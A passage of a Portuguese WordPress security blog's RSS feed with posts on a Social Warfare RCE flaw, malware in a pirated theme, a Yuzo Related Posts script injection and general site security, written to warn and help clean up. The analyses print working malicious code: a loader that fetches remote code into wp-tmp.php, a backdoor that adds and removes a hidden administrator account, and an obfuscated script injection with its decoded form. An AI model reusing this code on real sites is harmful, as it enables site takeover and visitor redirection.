					<description><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha. O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha.</p>
<p>O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa se_Migration.php, dentro desse arquivo existe uma varável com o nome $_GET[‘swp_url’] com a função get_file_content do php, que permite a execução de códigos remotamente:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-107 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg" alt="" width="574" height="270" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg 574w, https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270-300x141.jpg 300w" sizes="auto, (max-width: 574px) 100vw, 574px" /></p>
<p>A grande falha aqui está na função is_admin() do wordpress que é utilizada incorretamente, que faz somente a checagem se a url solicitada faz parte da página de admin, não fazendo a validação se o administrador está logado.</p>
<h3>Fazendo o teste:</h3>
<p>Novamente usei o laboratório local para teste, colocando o exploit e payload em outra maquina para comprovar o acesso não autorizado, como o código permite execução de comandos dentro de arquivos, criei um arquivo txt com a função phpinfo(), segue o resultado:</p>
<p>&nbsp;</p>
<p>E se eu quiser o nome da base de dados e outras infromações importantes, basta o invasor usar a imaginação (isso eles tem de sobra), baixar conteúdo, visualizar a senha da base de dados e até inserir usuários no banco de dados, criando outro admin para o site.</p>
<h3>Não acaba por ai, temos uma vulnerabilidade de XSS de brinde:</h3>
<p>Além da falha citada acima, essa brecha abre caminho para inserir conteúdo no banco de dados com técnicas de Cross Site Scripting, assim como mostrei no <a href="https://www.ethsecurity.com.br/2019/04/19/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">post do Yuzo Related Posts</a></p>
<p>Com a mesma url é utilizado um outro exploit e dessa vez podemos inserir conteúdo no banco de dados e redirecionar o site para domínios maliciosos, não vamos detalhar a vulnerabilidade pois seria um copiar e colar do post relacionado ao related posts.</p>
<h3>Solução:</h3>
<p>Atualize o plugin o mais rápido possível para a versão acima de 3.5.3 .</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">236</post-id>	</item>
		<item>
		<title>Por que não utilizar temas e plugins piratas.</title>
		<link>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/</link>
					<comments>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Tue, 23 Apr 2019 12:36:32 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[plugin pirata]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[tema nulled]]></category>
		<category><![CDATA[tema pirata]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=209</guid>

					<description><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise. Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise.</p>
<p>Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:</p>
<p>./wp-content/themes/twentynineteen/functions.php<br />
./wp-content/themes/twentyseventeen/functions.php<br />
./wp-content/themes/twentysixteen/functions.php<br />
./wp-includes/post.php<br />
./wp-includes/wp-tmp.php<br />
./wp-includes/wp-vcd.php</p>
<p>Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:</p>
<p>elseif ($tmpcontent = @file_get_contents(&#8220;http://www. harors .pw/code .php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {</p>
<p>if (stripos($tmpcontent, $wp_auth_key) !== false) {<br />
extract(theme_temp_setup($tmpcontent));<br />
@file_put_contents(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;, $tmpcontent);</p>
<p>if (!file_exists(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;)) {<br />
@file_put_contents(get_template_directory() . &#8216;/wp-tmp.php&#8217;, $tmpcontent);<br />
if (!file_exists(get_template_directory() . &#8216;/wp-tmp.php&#8217;)) {<br />
@file_put_contents(&#8216;wp-tmp.php&#8217;, $tmpcontent);</p>
<p>verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:</p>
<p>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;//deloplen .com/ apu.php?zoneid=2542869&#8243; async data-cfasync=&#8221;false&#8221;&gt;&lt;/script&gt;<br />
&lt;script src=&#8221;//pushqwer .com/ ntfc.php?p=2542872&#8243; data-cfasync=&#8221;false&#8221; async&gt;&lt;/script&gt;</p>
<p>Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso &#8220;O site a seguir contém conteúdo malicioso ou enganoso&#8221;.</p>
<p>Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.</p>
<p>Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:</p>
<p>require $_SERVER[&#8216;DOCUMENT_ROOT&#8217;].&#8217;/wp-load.php&#8217;;<br />
$table_name = $wpdb-&gt;get_blog_prefix();<br />
$sample = &#8216;a:1:{s:13:&#8221;administrator&#8221;;b:1;}&#8217;;<br />
if( isset($_GET[&#8216;ok&#8217;]) ) { echo &#8216;&lt;!&#8211; Silence is golden. &#8211;&gt;&#8217;;}<br />
if( isset($_GET[&#8216;awu&#8217;]) ) {<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (&#8216;100010010&#8217;, &#8216;100010010&#8217;, &#8216;\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.&#8217;, &#8216;100010010&#8217;, &#8216;te@ea.st&#8217;, &#8221;, &#8216;2011-06-07 00:00:00&#8217;, &#8221;, &#8216;0&#8217;, &#8216;100010010&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, &#8216;100010010&#8217;, &#8216;{$table_name}capabilities&#8217;, &#8216;{$sample}&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, &#8216;100010010&#8217;, &#8216;{$table_name}user_level&#8217;, &#8217;10&#8217;);&#8221;); }<br />
if( isset($_GET[&#8216;dwu&#8217;]) ) { $wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;users WHERE `ID` = 100010010&#8221;);<br />
$wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;usermeta WHERE $wpdb-&gt;usermeta.`umeta_id` = 100010010&#8221;);}<br />
if( isset($_GET[&#8216;key&#8217;]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo &#8216;&lt;center&gt;&lt;h2&gt;&#8217; . esc_attr( $options[&#8216;user_name&#8217;] . &#8216;:&#8217; . esc_attr( $options[&#8216;api_key&#8217;])) . &#8216;&lt;br&gt;&#8217;;<br />
echo esc_html( envato_market()-&gt;get_option( &#8216;token&#8217; ) ); echo &#8216;&lt;/center&gt;&lt;/h2&gt;&#8217;; }</p>
<p>Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):</p>
<p>| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |</p>
<p>Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.</p>
<h3>Conclusão:</h3>
<p>Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.</p>
<p>Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">209</post-id>	</item>
		<item>
		<title>[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</title>
		<link>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/</link>
					<comments>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 19 Apr 2019 12:06:24 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[remoção de malwares]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=138</guid>

					<description><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz que a falha seja explorada.</p>
<p><iframe loading="lazy" width="1200" height="675" src="https://www.youtube.com/embed/0iJeesXerGs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Infecção:</h3>
<p>Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:</p>
<p><strong><code class="plain">&lt;script language=javascript&gt;</code></strong><strong><code class="functions">eval</code></strong><strong><code class="plain">(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));&lt;/script&gt;</code></strong></p>
<p>O código descriptografado fica dessa maneira:</p>
<p><strong>&lt;/style&gt;&lt;script language=javascript&gt;var elem = document.createElement(&#8216;script&#8217;);</strong></p>
<p><strong>elem.type = &#8216;text/javascript&#8217;;</strong></p>
<p><strong>elem.async = true; elem.src = &#8216;hxxps://hellofromhony[.]org/counter&#8217;;</strong></p>
<p><strong>document.getElementsByTagName(&#8216;head&#8217;)[0].appendChild(elem);&lt;/script&gt;</strong></p>
<p>Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<h3>Removendo a infecção:</h3>
<p>Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.</p>
<p>Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string &#8220;String.fromCharCode(118&#8221; ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:</p>
<p><img loading="lazy" decoding="async" class="size-medium wp-image-161 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png" alt="" width="300" height="240" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to.png 631w" sizes="auto, (max-width: 300px) 100vw, 300px" /></p>
<p>Após isso você verá que o conteúdo foi encontrado na tabela wp_options:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-162" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png" alt="" width="328" height="262" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2.png 631w" sizes="auto, (max-width: 328px) 100vw, 328px" /></p>
<p>Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.</p>
<p>&nbsp;</p>
<h3>Contra medida:</h3>
<p>&nbsp;</p>
<h3><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-90" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png" alt="" width="300" height="225" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-768x576.png 768w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-700x525.png 700w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234.png 770w" sizes="auto, (max-width: 300px) 100vw, 300px" /></h3>
<p>Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:</p>
<p>https://wordpress.org/support/topic/remove-this-plugin-immediately/</p>
<p>Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:</p>
<p>&nbsp;</p>
<p>RewriteEngine on<br />
ErrorDocument 406 &#8220;&lt;head&gt;&lt;title&gt;Bad Request!&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Blocked by Defensor Web!&lt;/h1&gt;&lt;p&gt;Hacking Attempt!. &lt;/p&gt;&lt;/body&gt;&lt;/html&gt;&#8221;<br />
RewriteEngine On<br />
RewriteCond %{THE_REQUEST} &#8220;POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1&#8221; [NC]<br />
RewriteRule .* – [R=406,L]</p>
<p>&nbsp;</p>
<p>As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:</p>
<p><a href="https://pastebin.com/GKYBv5Qt">https://pastebin.com/GKYBv5Qt</a></p>
<p>&nbsp;</p>
<p>Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">138</post-id>	</item>
		<item>
		<title>Segurança de sites, uma visão geral.</title>
		<link>https://ethsecurity.com.br/seguranca-de-sites-uma-visao-geral/</link>
					<comments>https://ethsecurity.com.br/seguranca-de-sites-uma-visao-geral/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Mon, 08 Apr 2019 22:47:39 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=92</guid>

					<description><![CDATA[<p>&#160; Diariamente milhares de sites sofrem algum tipo de infecção. As motivações do invasor e a falha que permitiu a invasão são várias que praticamente merecia um post para cada situação, porém neste primeiro post de nosso site vamos abordar as causas mais comuns e como proteger sua presença online de terceiros mal intencionados. O [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/seguranca-de-sites-uma-visao-geral/">Segurança de sites, uma visão geral.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Diariamente milhares de sites sofrem algum tipo de infecção. As motivações do invasor e a falha que permitiu a invasão são várias que praticamente merecia um post para cada situação, porém neste primeiro post de nosso site vamos abordar as causas mais comuns e como proteger sua presença online de terceiros mal intencionados.</p>
<h1></h1>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<h3>O que leva alguém a invadir um site?</h3>
<p>Como citado acima, existem inúmeros motivos que levam alguém a praticar tal ato ilícito, porém entre os mais comuns estão desafiar seus conhecimentos, quebrar a segurança, sentir se capaz daquilo, a mesma sensação que um montanhista tem quando atinge o pico mais alto de uma montanha, ou de um maratonista ao passar pela linha de chegada.</p>
<p>Existem também, os mais comuns, os que fazem isso para obter vantagem financeira praticando crimes, como hospedagem e envio de phishing, spam e outros malwares para os mais diversos fins, pense, para que comprar uma hospedagem ou um servidor se você pode se aproveitar de falhas de segurança deixadas pelos usuários para hospedar o conteúdo malicioso.</p>
<h3>Como o invasor age?</h3>
<p><img loading="lazy" decoding="async" class="wp-image-89 alignnone size-full" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/images-16317616788515791178..jpg" width="678" height="452" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/images-16317616788515791178..jpg 678w, https://ethsecurity.com.br/wp-content/uploads/2019/04/images-16317616788515791178.-300x200.jpg 300w" sizes="auto, (max-width: 678px) 100vw, 678px" /></p>
<p>Embora existam casos em que o site foi uma vítima escolhida a dedo, na grande maioria das vezes os ataques são aleatórios e automáticos, para entendermos melhor, imagine as últimas falhas de segurança de algum plugin do WordPress, depois que essa fica conhecida e feito um &#8220;exploit&#8221; para essa, abordaremos mais sobre esses termos no futuro, porem resumindo, é uma ferramenta que permite a exploração automática da falha de segurança, depois é feito um processo automático que começará a varrer a internet atrás de sites que possuam essa falha, então após explorada com sucesso e que será feito upload de arquivos maliciosos, como o phishing por exemplo.</p>
<p>Outros agem de uma forma diferente, espalham pela internet através de emails falsos um vírus que infecta o computador ou dispositivo móvel de quem o abre, então aquele dispositivo passa a ser monitorado,  quando uma senha de e-mail, ou outro qualquer serviço, como as credenciais da área administrativa de seu site ou painel de controle é utilizada a mesma é interceptada e enviada para quem está por trás da disseminação do malware, dando assim acesso administrativo àquele site para que seja utilizado para as ações anteriormente citadas, até que seja percebida a invasão e as medidas de segurança e desinfecção sejam tomadas.</p>
<h3>Como se proteger?</h3>
<p><img loading="lazy" decoding="async" class="wp-image-91 alignnone size-full" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/images-24467067604682171273..jpg" width="360" height="360" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/images-24467067604682171273..jpg 360w, https://ethsecurity.com.br/wp-content/uploads/2019/04/images-24467067604682171273.-150x150.jpg 150w, https://ethsecurity.com.br/wp-content/uploads/2019/04/images-24467067604682171273.-300x300.jpg 300w" sizes="auto, (max-width: 360px) 100vw, 360px" /></p>
<p>Não é necessário ser um expert em segurança de sites para tomar medidas simples e eficazes na proteção de seu site.</p>
<p>Mantenha seu site sempre, sempre, sempre atualizado, atualizações são para melhorias, correção de bugs e falhas de segurança.</p>
<p>Utilize computadores e dispositivos confiáveis para realizar a administração de seu site.</p>
<p>Mantenha sempre um antivírus funcionando e atualizado em seu computador, fazendo varreduras períodicas</p>
<p><span id="more-92"></span></p>
<p>para manter seus dados seguros.</p>
<p>Instale temas e plugins de fontes confiáveis, muitos caem no erro de baixarem de locais que disponibilizam gratuitamente programas pagos e ao instalarem o site e infectado por várias ameaças.</p>
<h3>Conclusão.</h3>
<p>Não importa para que fim você possui um site, uma loja online, um blog pessoal para compartilhar seus conhecimentos ou experiências, a segurança sempre deve estar no checklist das prioridades para que você possa ficar tranquilo sabendo que seu conteúdo está chegando a seu público alvo de uma forma segura.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/seguranca-de-sites-uma-visao-geral/">Segurança de sites, uma visão geral.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/seguranca-de-sites-uma-visao-geral/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">92</post-id>	</item>
	</channel>
</rss>
